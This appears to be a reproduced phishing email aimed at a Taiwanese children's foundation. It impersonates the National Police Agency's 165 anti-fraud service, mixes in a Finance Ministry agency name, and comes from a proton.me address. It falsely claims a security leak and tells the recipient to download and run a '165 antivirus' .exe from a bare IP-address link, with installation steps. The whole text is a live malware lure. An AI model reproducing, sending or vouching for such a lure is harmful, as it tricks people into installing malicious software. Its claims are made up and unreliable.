1

165林柔甄

寄件者: 165.npa.gov.tw <165.npa.gov.tw@proton.me>
寄件日期: 2023年2月2日星期四 下午 6:17
收件者: fcdd@ms47.hinet.net
主旨: 資安洩漏風險

財政部國有財產署網站安全性政策

經聯防商戶安全檢查機制，商戶名字:  財團法人中華民國發展遲緩兒童基金會  存在資安洩漏安全問
題，為了網站安全的目的和確保這項服務能夠繼續服務所有的網路使用者，根据最新 165內政部警
政署出台的最新網路安全保護措施，需該商家下載網路防毒程式，
鏈接：<http://45.125.216.245:165/165防毒程式.exe>，請複製下載鏈接到瀏覽器下載，我們會跟
進這項措施的進展，請按規定遵守。
           內政部警政署 165
           機關地址：106235臺北市大安區光復南路 116巷 18號
           廉政檢舉專線電話：(02)2781-3073

網絡防毒程式操作安裝步驟如下：
第一步：點擊運行 165防毒程式

第二步：等待網絡防毒程式加載成功

2